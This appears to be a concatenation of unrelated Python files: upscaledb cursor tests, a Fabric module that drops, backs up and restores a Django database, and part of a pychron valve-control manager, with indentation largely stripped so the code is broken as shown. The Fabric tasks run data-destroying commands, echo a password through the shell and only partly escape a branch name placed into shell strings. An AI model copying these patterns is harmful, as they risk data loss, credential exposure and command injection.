if dtype is mixed16 and map_mixed16 is not None:
dtype = map_mixed16
return numpy.dtype(dtype)
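# Hedged illustration of how get_dtype() resolves dtypes (assuming the defaults
# configured below):
#   get_dtype()                           # -> numpy.dtype(config.dtype)
#   get_dtype(numpy.float64)              # -> dtype('float64')
#   get_dtype(map_mixed16=numpy.float32)  # -> dtype('float32') when config.dtype is mixed16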
def get_compute_mode():
return config.compute_mode
basic_math.install_variable_arithmetics()
array.get_item.install_variable_get_item()
disable_experimental_feature_warning = False
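# Hedged usage sketch of the thread-local configuration set up above
# (``model`` and ``x`` are placeholders): ``train`` and ``enable_backprop``
# are typically flipped together for evaluation passes:
#   with using_config('train', False), using_config('enable_backprop', False):
#       y = model(x)  # inference-mode forward pass; no graph is retained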
|
|
#
# Copyright (C) 2005-2016 Christoph Rupp (chris@crupp.de).
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# See the file COPYING for License information.
#
import unittest
# set the library path, otherwise upscaledb.so/.dll is not found
import os
import sys
import distutils.util
p = distutils.util.get_platform()
ps = ".%s-%s" % (p, sys.version[0:3])
sys.path.insert(0, os.path.join('build', 'lib' + ps))
sys.path.insert(1, os.path.join('..', 'build', 'lib' + ps))
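# For illustration: on 64-bit Linux under CPython 2.7, get_platform() yields
# 'linux-x86_64' and sys.version[0:3] is '2.7', so the prepended directory
# would be 'build/lib.linux-x86_64-2.7'.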
import upscaledb
class CursorTestCase(unittest.TestCase):
def testClone(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
clone = c.clone()
c.close()
clone.close()
db.close()
def testCloneAutoClose(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
clone = c.clone()
c.close()
clone.close()
db.close()
env.close()
def testCloneNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
clone = c.clone(13)
except TypeError:
pass
c.close()
db.close()
env.close()
def testMoveTo(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
c.move_to(upscaledb.UPS_CURSOR_NEXT)
c.move_to(upscaledb.UPS_CURSOR_LAST)
c.close()
db.close()
env.close()
def testMoveToNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
try:
c = upscaledb.cursor()
except TypeError:
pass
try:
c = upscaledb.cursor("blah")
except TypeError:
pass
try:
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
except upscaledb.error, (errno, string):
assert upscaledb.UPS_KEY_NOT_FOUND == errno
c.close()
db.close()
env.close()
def testGetKey(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert "key1" == c.get_key()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert "key2" == c.get_key()
c.move_to(upscaledb.UPS_CURSOR_LAST)
assert "key3" == c.get_key()
c.close()
db.close()
env.close()
def testGetKeyNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.get_key()
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
try:
c.get_key(333)
except TypeError:
pass
c.close()
db.close()
env.close()
def testGetRecord(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert "value1" == c.get_record()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert "value2" == c.get_record()
c.move_to(upscaledb.UPS_CURSOR_LAST)
assert "value3" == c.get_record()
c.close()
db.close()
env.close()
def testGetRecordNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.get_record()
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
try:
c.get_record(333)
except TypeError:
pass
c.close()
db.close()
env.close()
def testGetOverwrite(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert "value1" == c.get_record()
c.overwrite("value11");
assert "value11" == c.get_record()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert "value2" == c.get_record()
c.overwrite("value22");
assert "value22" == c.get_record()
c.move_to(upscaledb.UPS_CURSOR_LAST)
assert "value3" == c.get_record()
c.overwrite("value33");
assert "value33" == c.get_record()
c.close()
db.close()
env.close()
    def testGetOverwriteNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.overwrite("asdf")
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
try:
c.overwrite(None)
except TypeError:
pass
try:
c.overwrite(33)
except TypeError:
pass
c.close()
db.close()
env.close()
def testFind(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
c.find("key1")
assert "key1" == c.get_key()
assert "value1" == c.get_record()
c.find("key3")
assert "key3" == c.get_key()
assert "value3" == c.get_record()
c.find("key2")
assert "key2" == c.get_key()
assert "value2" == c.get_record()
c.close()
db.close()
env.close()
def testFindRecno(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_RECORD_NUMBER64)
db.insert(None, 1, "value1")
db.insert(None, 2, "value2")
db.insert(None, 3, "value3")
c = upscaledb.cursor(db)
c.find(1)
assert 1 == c.get_key()
assert "value1" == c.get_record()
try:
c.find("1")
except TypeError:
pass
c.close()
db.close()
env.close()
def testFindNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
db.insert(None, "key1", "value1")
db.insert(None, "key2", "value2")
db.insert(None, "key3", "value3")
c = upscaledb.cursor(db)
try:
c.find("key4")
except upscaledb.error, (errno, string):
assert upscaledb.UPS_KEY_NOT_FOUND == errno
try:
c.find(1)
except TypeError:
pass
try:
c.find()
except TypeError:
pass
c.close()
db.close()
env.close()
def testInsert(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
c.insert("key1", "value1")
assert "key1" == c.get_key()
assert "value1" == c.get_record()
c.insert("key3", "value3")
assert "key3" == c.get_key()
assert "value3" == c.get_record()
c.insert("key2", "value2")
assert "key2" == c.get_key()
assert "value2" == c.get_record()
c.close()
db.close()
env.close()
def testInsertRecno(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_RECORD_NUMBER32)
c = upscaledb.cursor(db)
c.insert(1, "value1")
assert 1 == c.get_key()
assert "value1" == c.get_record()
c.insert(2, "value2")
c.insert(3, "value3")
try:
c.insert("1", "blah")
except TypeError:
pass
c.close()
db.close()
env.close()
def testInsertNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.insert(3, "value1")
except TypeError:
pass
try:
c.insert("a", "key2", "value2")
except TypeError:
pass
try:
c.insert()
except TypeError:
pass
try:
c.insert("key1", "value1")
c.insert("key1", "value1")
except upscaledb.error, (errno, string):
assert upscaledb.UPS_DUPLICATE_KEY == errno
c.close()
db.close()
env.close()
def testErase(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
c.insert("key1", "value1")
assert "key1" == c.get_key()
assert "value1" == c.get_record()
c.erase()
try:
c.find("key1")
except upscaledb.error, (errno, string):
assert upscaledb.UPS_KEY_NOT_FOUND == errno
c.close()
db.close()
env.close()
def testEraseNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1)
c = upscaledb.cursor(db)
try:
c.erase(3)
except TypeError:
pass
try:
c.erase("a", "key2", "value2")
except TypeError:
pass
try:
c.erase()
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
c.close()
db.close()
env.close()
def testGetDuplicateCount(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_ENABLE_DUPLICATE_KEYS)
c = upscaledb.cursor(db)
c.insert("key1", "value1")
assert 1 == c.get_duplicate_count()
c.insert("key1", "value2", upscaledb.UPS_DUPLICATE)
assert 2 == c.get_duplicate_count()
c.insert("key1", "value3", upscaledb.UPS_DUPLICATE)
assert 3 == c.get_duplicate_count()
c.erase()
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert 2 == c.get_duplicate_count()
c.close()
db.close()
env.close()
def testGetDuplicatePosition(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_ENABLE_DUPLICATE_KEYS)
c = upscaledb.cursor(db)
c.insert("key1", "value1")
c.insert("key1", "value2", upscaledb.UPS_DUPLICATE)
c.insert("key1", "value3", upscaledb.UPS_DUPLICATE)
c.insert("key1", "value4", upscaledb.UPS_DUPLICATE)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert 0 == c.get_duplicate_position()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 1 == c.get_duplicate_position()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 2 == c.get_duplicate_position()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 3 == c.get_duplicate_position()
c.close()
db.close()
env.close()
def testGetRecordSize(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_ENABLE_DUPLICATE_KEYS)
c = upscaledb.cursor(db)
c.insert("key1", "v")
c.insert("key2", "va")
c.insert("key3", "val")
c.insert("key4", "valu", upscaledb.UPS_DUPLICATE)
c.insert("key4", "value", upscaledb.UPS_DUPLICATE)
c.move_to(upscaledb.UPS_CURSOR_FIRST)
assert 1 == c.get_record_size()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 2 == c.get_record_size()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 3 == c.get_record_size()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 4 == c.get_record_size()
c.move_to(upscaledb.UPS_CURSOR_NEXT)
assert 5 == c.get_record_size()
c.close()
db.close()
env.close()
def testGetDuplicateCountNegative(self):
env = upscaledb.env()
env.create("test.db")
db = env.create_db(1, upscaledb.UPS_ENABLE_DUPLICATE_KEYS)
c = upscaledb.cursor(db)
try:
c.get_duplicate_count()
except upscaledb.error, (errno, string):
assert upscaledb.UPS_CURSOR_IS_NIL == errno
c.insert("key1", "value1")
try:
c.get_key(333)
except TypeError:
pass
try:
c.get_key("asdf")
except TypeError:
pass
c.close()
db.close()
env.close()
if __name__ == '__main__':
    unittest.main()
|
|
"""Fabric tasks to automate typical database actions.
There are three DB tasks:
* db.init
* db.backup
* db.restore
To list all available tasks::
fab --list
All tasks determine the DB engine from the Django settings and perform the
appropriate actions.
Init DB task
------------
Usage::
fab db.init
This task performs the following actions:
1. DROP the database named in the Django settings
2. CREATE a new database with that name
3. Apply all migrations
4. Load fixture data
5. Deploy FSMs
Backup DB task
--------------
Usage::
fab db.backup[:custom_branch_name]
This task performs the following actions:
1. Dump the database: ``pg_dump ... > backup.postgres.custom_branch_name``
   for PostgreSQL, or ``cp mysite.db backup.sqlite.custom_branch_name``
   for SQLite (no DROP/CREATE is performed for a backup).
If the ``custom_branch_name`` param is not given, the task uses the current
git branch name as the suffix for the backup files.
Restore DB task
---------------
Usage::
fab db.restore[:custom_branch_name]
This task performs the following actions:
1. DROP the database named in the Django settings
2. CREATE a new database with that name
3. ``psql < backup.postgres.custom_branch_name`` for PostgreSQL, or
   ``cp backup.sqlite.custom_branch_name mysite.db`` for SQLite.
If the ``custom_branch_name`` param is not given, the task uses the current
git branch name as the suffix for the backup files.
If the task cannot find the backup file, it lists all available backup files
for the DB engine given in the Django settings.
"""
import re
import os
import sys
from fab_settings import env
from fabric.contrib import django
from fabric.api import local, settings, hide, lcd
from fabric.tasks import Task
sys.path.append(os.path.dirname(__file__) + '/../../mysite/')
django.settings_module('mysite.settings')
from django.conf import settings as dj_settings
class BaseTask(Task):
"""
Base class for all DB tasks.
"""
db_cfg = dj_settings.DATABASES['default']
engine = db_cfg.get('ENGINE').split('.')[-1]
base_path = os.path.dirname(__file__) + '/../..'
def run(self, action, suffix=None):
handlers = {
'postgresql_psycopg2': getattr(BaseTask, '%s_db_postgres' % action),
'sqlite3': getattr(BaseTask, '%s_db_sqlite' % action)
}
suffix = suffix or local('git rev-parse --abbrev-ref HEAD', capture=True)
suffix = re.sub(r'/', r'\\\\', suffix)
suffix = re.sub(r'!', r'\\!', suffix)
suffix = re.sub(r'\$', r'U+0024', suffix)
suffix = re.sub(r'`', r'\\`', suffix)
try:
handlers[self.engine].__call__(self, suffix)
except KeyError:
print('Error: Unknown engine `%s`' % self.engine)
def postgres(fn):
"""
Decorator that adds PostgreSQL specific actions to task.
"""
def wrapped(self, *args, **kwargs):
local(
'echo localhost:5432:postgres:%s:%s > ~/.pgpass'
% (self.db_cfg['USER'], self.db_cfg['PASSWORD'])
)
local(
'echo localhost:5432:%s:%s:%s >> ~/.pgpass'
% (self.db_cfg['NAME'], self.db_cfg['USER'], self.db_cfg['PASSWORD'])
)
local('chmod 600 ~/.pgpass')
fn(self, *args, **kwargs)
local('rm ~/.pgpass')
return wrapped
@postgres
def init_db_postgres(self, *args, **kwargs):
"""
Init db to original state for postgres.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
local('dropdb %s --username=%s -w ' % (self.db_cfg['NAME'], self.db_cfg['USER']))
local('createdb %s encoding="UTF8" --username=%s -w' % (self.db_cfg['NAME'], self.db_cfg['USER']))
local('%s/bin/python mysite/manage.py migrate' % env.venv_name)
local('%s/bin/python mysite/manage.py loaddata mysite/dumpdata/debug-wo-fsm.json' % env.venv_name)
local('%s/bin/python mysite/manage.py fsm_deploy' % env.venv_name)
def init_db_sqlite(self, *args, **kwargs):
"""
Init db to original state for sqlite.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
local('rm %s/mysite.db' % dj_settings.BASE_DIR)
local('%s/bin/python mysite/manage.py migrate' % env.venv_name)
local('%s/bin/python mysite/manage.py loaddata mysite/dumpdata/debug-wo-fsm.json' % env.venv_name)
local('%s/bin/python mysite/manage.py fsm_deploy' % env.venv_name)
@postgres
def backup_db_postgres(self, suffix, *args, **kwargs):
"""
Backup Postgres DB.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
local(
'pg_dump %s -U %s -w > %s/backups/backup.postgres.%s'
% (self.db_cfg['NAME'], self.db_cfg['USER'], self.base_path, suffix)
)
def backup_db_sqlite(self, suffix, *args, **kwargs):
"""
Backup Sqlite DB.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
local(
'cp %s/mysite.db %s/backups/backup.sqlite.%s'
% (dj_settings.BASE_DIR, self.base_path, suffix)
)
@postgres
def restore_db_postgres(self, suffix, *args, **kwargs):
"""
Restore Postgres DB.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
if not local('ls %s/backups/backup.postgres.%s' % (self.base_path, suffix)).succeeded:
return self.list_backups('postgres')
local('dropdb %s --username=%s -w ' % (self.db_cfg['NAME'], self.db_cfg['USER']))
local(
'createdb %s encoding="UTF8" --username=%s -w'
% (self.db_cfg['NAME'], self.db_cfg['USER'])
)
local(
'psql %s -U %s -w < %s/backups/backup.postgres.%s'
% (self.db_cfg['NAME'], self.db_cfg['USER'], self.base_path, suffix)
)
def restore_db_sqlite(self, suffix, *args, **kwargs):
"""
Restore Sqlite DB.
"""
with lcd(self.base_path), settings(hide('warnings'), warn_only=True):
result = local(
'cp %s/backups/backup.sqlite.%s %s/mysite.db'
% (self.base_path, suffix, dj_settings.BASE_DIR)
)
if not result.succeeded:
self.list_backups('sqlite')
@staticmethod
def list_backups(engine):
print('='*32)
print('There is no requested backup file.')
backups = local('ls backups', capture=True).split()
print('Below you can find available backup files:')
for backup in backups:
if re.match(r'^backup\.%s\.' % engine, backup):
print(backup)
class RestoreDBTask(BaseTask):
"""
Restore DB task.
"""
name = 'restore'
action = 'restore'
def run(self, suffix=None):
super(RestoreDBTask, self).run(self.action, suffix)
class BackupDBTask(BaseTask):
"""
Backup db task.
"""
name = 'backup'
action = 'backup'
def run(self, suffix=None):
super(BackupDBTask, self).run(self.action, suffix)
class InitDBTask(BaseTask):
"""
Backup db task.
"""
name = 'init'
action = 'init'
def run(self):
super(InitDBTask, self).run(self.action)
restore = RestoreDBTask()
backup = BackupDBTask()
init = InitDBTask()
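# Hedged usage sketch: when this module is exposed to Fabric as the ``db``
# namespace (the fabfile wiring is outside this file), the instances above are
# invoked as documented in the module docstring:
#   fab db.init
#   fab db.backup:my-branch   # -> backups/backup.<engine>.my-branch
#   fab db.restore            # suffix defaults to the current git branch name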
|
|
# ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import logging
import time
from socket import gethostbyname, gethostname
from threading import Thread
# =============enthought library imports=======================
from apptools.preferences.preference_binding import bind_preference
from pyface.timer.do_later import do_after
from traits.api import Instance, List, Any, Bool, on_trait_change, Str, Int, Dict, File, Float, Enum
from pychron.canvas.canvas_editor import CanvasEditor
from pychron.core.file_listener import FileListener
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.core.wait.wait_group import WaitGroup
from pychron.envisage.consoleable import Consoleable
from pychron.extraction_line import LOG_LEVEL_NAMES, LOG_LEVELS
from pychron.extraction_line.explanation.extraction_line_explanation import ExtractionLineExplanation
from pychron.extraction_line.extraction_line_canvas import ExtractionLineCanvas
from pychron.extraction_line.graph.extraction_line_graph import ExtractionLineGraph
from pychron.extraction_line.sample_changer import SampleChanger
from pychron.globals import globalv
from pychron.hardware.core.i_core_device import ICoreDevice
from pychron.managers.manager import Manager
from pychron.monitors.system_monitor import SystemMonitor
from pychron.pychron_constants import NULL_STR
class ExtractionLineManager(Manager, Consoleable):
"""
Manager for interacting with the extraction line
contains reference to valve manager, gauge manager and laser manager
"""
canvas = Instance(ExtractionLineCanvas)
canvases = List
plugin_canvases = List
explanation = Instance(ExtractionLineExplanation, ())
monitor = Instance(SystemMonitor)
switch_manager = Any
gauge_manager = Any
cryo_manager = Any
multiplexer_manager = Any
network = Instance(ExtractionLineGraph)
readback_items = List
runscript = None
learner = None
mode = 'normal'
valve_state_frequency = Int
valve_lock_frequency = Int
check_master_owner = Bool
use_network = Bool
display_volume = Bool
volume_key = Str
sample_changer = Instance(SampleChanger)
link_valve_actuation_dict = Dict
canvas_path = File
canvas_config_path = File
use_hardware_update = Bool
hardware_update_period = Float
file_listener = None
wait_group = Instance(WaitGroup, ())
console_bgcolor = 'black'
_active = False
_update_status_flag = None
_monitoring_valve_status = False
canvas_editor = Instance(CanvasEditor, ())
logging_level = Enum(LOG_LEVEL_NAMES)
def set_extract_state(self, *args, **kw):
pass
def activate(self):
self._active = True
self._load_additional_canvases()
self._activate_hook()
self.reload_canvas()
devs = self.application.get_services(ICoreDevice)
self.devices = devs
def deactivate(self):
if self.gauge_manager:
self.gauge_manager.stop_scans()
if self.monitor:
self.monitor.stop()
self._active = False
self._deactivate_hook()
def bind_preferences(self):
prefid = 'pychron.extraction_line'
attrs = ('canvas_path', 'canvas_config_path',
'use_hardware_update', 'hardware_update_period',
'check_master_owner', 'use_network', 'logging_level')
for attr in attrs:
try:
bind_preference(self, attr, '{}.{}'.format(prefid, attr))
except BaseException as e:
                print('failed to bind preference', attr, e)
bind_preference(self.network, 'inherit_state', '{}.inherit_state'.format(prefid))
self.console_bind_preferences('{}.console'.format(prefid))
if self.gauge_manager:
bind_preference(self.gauge_manager, 'update_period', '{}.gauge_update_period'.format(prefid))
bind_preference(self.gauge_manager, 'use_update', '{}.use_gauge_update'.format(prefid))
if self.canvas:
bind_preference(self.canvas.canvas2D, 'display_volume', '{}.display_volume'.format(prefid))
bind_preference(self.canvas.canvas2D, 'volume_key', '{}.volume_key'.format(prefid))
def link_valve_actuation(self, name, func, remove=False):
if remove:
try:
del self.link_valve_actuation_dict[name]
except KeyError:
self.debug('could not remove "{}". not in dict {}'.format(name,
','.join(
list(
self.link_valve_actuation_dict.keys()))))
else:
self.debug('adding name="{}", func="{}" to link_valve_actuation_dict'.format(name, func.__name__))
self.link_valve_actuation_dict[name] = func
def enable_auto_reload(self):
self.file_listener = fm = FileListener(path=self.canvas_path,
callback=self.reload_canvas)
def disable_auto_reload(self):
if self.file_listener:
self.file_listener.stop()
def do_sample_loading(self):
"""
1. isolate chamber
2.
:return:
"""
sc = self._sample_changer_factory()
if sc:
if self.confirmation_dialog('Ready to Isolate Chamber'):
self._handle_console_message(('===== Isolate Chamber =====', 'maroon'))
if not sc.isolate_chamber():
return
else:
return
if self.confirmation_dialog('Ready to Evacuate Chamber'):
self._handle_console_message(('===== Evacuate Chamber =====', 'maroon'))
err = sc.check_evacuation()
if err:
name = sc.chamber
msg = 'Are you sure you want to evacuate the {} chamber. {}'.format(name, err)
if not self.confirmation_dialog(msg):
return
if not sc.evacuate_chamber():
return
else:
return
if self.confirmation_dialog('Ready to Finish Sample Change'):
self._handle_console_message(('===== Finish Sample Change =====', 'maroon'))
sc.finish_chamber_change()
def get_volume(self, node_name):
v = 0
if self.use_network:
v = self.network.calculate_volumes(node_name)[0][1]
return v
def test_cryo_communication(self):
self.info('test cryo communication')
ret, err = True, ''
if self.cryo_manager:
if self.cryo_manager.simulation:
ret = globalv.communication_simulation
else:
ret = self.cryo_manager.test_connection()
return ret, err
def test_gauge_communication(self):
self.info('test gauge communication')
ret, err = True, ''
if self.gauge_manager:
if self.gauge_manager.simulation:
ret = globalv.communication_simulation
else:
ret = self.gauge_manager.test_connection()
return ret, err
def test_connection(self):
self.info('test connection')
return self.test_valve_communication()
def test_valve_communication(self):
self.info('test valve communication')
print('asdf', self.switch_manager, hasattr(self.switch_manager, 'get_state_checksum'))
ret, err = True, ''
if self.switch_manager:
if hasattr(self.switch_manager, 'get_state_checksum'):
valves = self.switch_manager.switches
vkeys = sorted(valves.keys())
state = self.switch_manager.get_state_checksum(vkeys)
ret = bool(state)
return ret, err
def setup_status_monitor(self):
self.stop_status_monitor(id(self), block=True)
self.start_status_monitor(id(self))
self.refresh_states()
def stop_status_monitor(self, *args, **kw):
pass
def start_status_monitor(self, *args, **kw):
pass
def refresh_states(self, *args, **kw):
pass
def refresh_canvas(self):
# self.debug('refresh canvas')
for ci in self.canvases:
ci.refresh()
def finish_loading(self):
if self.use_network:
self.network.load(self.canvas_path)
self._set_logger_level(self.switch_manager)
def reload_canvas(self):
self.debug('reload canvas')
self.reload_scene_graph()
if self.use_network:
self.network.load(self.canvas_path)
sm = self.switch_manager
if sm:
sm.refresh_network()
for p in sm.pipette_trackers:
p.load()
for p in sm.pipette_trackers:
self._set_pipette_counts(p.name, p.counts)
self._reload_canvas_hook()
self.refresh_canvas()
def reload_scene_graph(self):
self.info('reloading canvas scene')
for c in self.canvases:
self.canvas_editor.load(c.canvas2D, self.canvas_path)
# c.load_canvas_file(c.config_name)
if self.switch_manager:
c.load_canvas_file(self.canvas_path, self.canvas_config_path, self.switch_manager.valves_path)
for k, v in self.switch_manager.switches.items():
vc = c.get_object(k)
if vc:
vc.soft_lock = v.software_lock
vc.state = v.state
def update_switch_state(self, name, state, *args, **kw):
# self.debug('update switch state {} {} args={} kw={}'.format(name, state, args, kw))
if self.use_network:
self.network.set_valve_state(name, state)
for c in self.canvases:
self.network.set_canvas_states(c, name)
for c in self.canvases:
c.update_switch_state(name, state, *args, **kw)
def update_switch_lock_state(self, *args, **kw):
for c in self.canvases:
c.update_switch_lock_state(*args, **kw)
def update_switch_owned_state(self, *args, **kw):
for c in self.canvases:
c.update_switch_owned_state(*args, **kw)
def set_valve_owner(self, name, owner):
"""
set flag indicating if the valve is owned by a system
"""
if self.switch_manager is not None:
self.switch_manager.set_valve_owner(name, owner)
def show_valve_properties(self, name):
if self.switch_manager is not None:
self.switch_manager.show_valve_properties(name)
def get_software_lock(self, name, **kw):
if self.switch_manager is not None:
return self.switch_manager.get_software_lock(name, **kw)
def set_software_lock(self, name, lock):
if self.switch_manager is not None:
if lock:
self.switch_manager.lock(name)
else:
self.switch_manager.unlock(name)
description = self.switch_manager.get_switch_by_name(name).description
self.info('{} ({}) {}'.format(name, description, 'lock' if lock else 'unlock'),
color='blue' if lock else 'black')
self.update_switch_lock_state(name, lock)
def get_state_checksum(self, vkeys):
if self.switch_manager is not None:
return self.switch_manager.calculate_checksum(vkeys)
def get_valve_owners(self):
if self.switch_manager is not None:
return self.switch_manager.get_owners()
def get_locked(self):
if self.switch_manager is not None:
return self.switch_manager.get_locked()
def get_valve_lock_states(self):
if self.switch_manager is not None:
return self.switch_manager.get_software_locks()
def get_valve_state(self, name=None, description=None):
if self.switch_manager is not None:
if description is not None and description.strip():
return self.switch_manager.get_state_by_description(description)
else:
return self.switch_manager.get_state_by_name(name)
def get_indicator_state(self, name=None, description=None):
if self.switch_manager is not None:
if description is not None and description.strip():
return self.switch_manager.get_indicator_state_by_description(description)
else:
return self.switch_manager.get_indicator_state_by_name(name)
def get_valve_states(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_states(query=not self.use_hardware_update)
def get_state_word(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_states(query=not self.use_hardware_update, version=1)
def get_lock_word(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_software_locks(version=1)
def get_valve_by_name(self, name):
if self.switch_manager is not None:
return self.switch_manager.get_switch_by_name(name)
def get_valve_names(self):
names = []
if self.switch_manager is not None:
names = self.switch_manager.get_valve_names()
return names
def get_pressure(self, controller, name):
if self.gauge_manager:
return self.gauge_manager.get_pressure(controller, name)
def get_device_value(self, dev_name):
dev = self.get_device(dev_name)
if dev is None:
self.unique_warning('No device named {}'.format(dev_name))
else:
return dev.get()
def disable_valve(self, description):
self._enable_valve(description, False)
def enable_valve(self, description):
self._enable_valve(description, True)
def lock_valve(self, name, **kw):
return self._lock_valve(name, True, **kw)
def unlock_valve(self, name, **kw):
return self._lock_valve(name, False, **kw)
def open_valve(self, name, **kw):
return self._open_close_valve(name, 'open', **kw)
def close_valve(self, name, **kw):
return self._open_close_valve(name, 'close', **kw)
def sample(self, name, **kw):
def sample():
valve = self.switch_manager.get_switch_by_name(name)
if valve is not None:
self.info('start sample')
self.open_valve(name, **kw)
time.sleep(valve.sample_period)
self.info('end sample')
self.close_valve(name, **kw)
t = Thread(target=sample)
t.start()
def cycle(self, name, **kw):
def cycle():
valve = self.switch_manager.get_switch_by_name(name)
if valve is not None:
n = valve.cycle_n
period = valve.cycle_period
self.info('start cycle n={} period={}'.format(n, period))
for i in range(n):
self.info('valve cycling iteration ={}'.format(i + 1))
self.open_valve(name, **kw)
time.sleep(period)
self.close_valve(name, **kw)
time.sleep(period)
t = Thread(target=cycle)
t.start()
def get_script_state(self, key):
return self.pyscript_editor.get_script_state(key)
def set_selected_explanation_item(self, obj):
if self.explanation:
selected = None
if obj:
selected = next((i for i in self.explanation.explanable_items if obj.name == i.name), None)
self.explanation.selected = selected
def new_canvas(self, config=None):
c = ExtractionLineCanvas(manager=self,
display_name='Extraction Line')
c.load_canvas_file(canvas_config_path=config)
self.canvases.append(c)
c.canvas2D.trait_set(display_volume=self.display_volume,
volume_key=self.volume_key)
if self.switch_manager:
self.switch_manager.load_valve_states()
self.switch_manager.load_valve_lock_states(force=True)
self.switch_manager.load_valve_owners()
c.refresh()
return c
def get_wait_control(self):
wd = self.wait_group.active_control
if wd.is_active():
wd = self.wait_group.add_control()
return wd
def set_cryo(self, v, v2=None):
self.debug('setting cryo to {}, {}'.format(v, v2))
if self.cryo_manager:
return self.cryo_manager.set_setpoint(v, v2)
else:
self.warning('cryo manager not available')
return 0, 0
def get_cryo_temp(self, iput):
self.debug('get cryo temp {}'.format(iput))
if self.cryo_manager:
return self.cryo_manager.read_input(iput)
else:
self.warning('cryo manager not available')
return 0
def set_experiment_type(self, v):
self.debug('setting experiment type={}'.format(v))
if self.cryo_manager:
self.cryo_manager.species = v
# ===============================================================================
# private
# ===============================================================================
def _load_additional_canvases(self):
for ci in self.plugin_canvases:
c = ExtractionLineCanvas(manager=self,
display_name=ci['display_name'], )
c.load_canvas_file(ci['canvas_path'], ci['config_path'], ci['valve_path'])
self.canvases.append(c)
def _activate_hook(self):
self.monitor = SystemMonitor(manager=self, name='system_monitor')
self.monitor.monitor()
if self.gauge_manager:
self.info('start gauge scans')
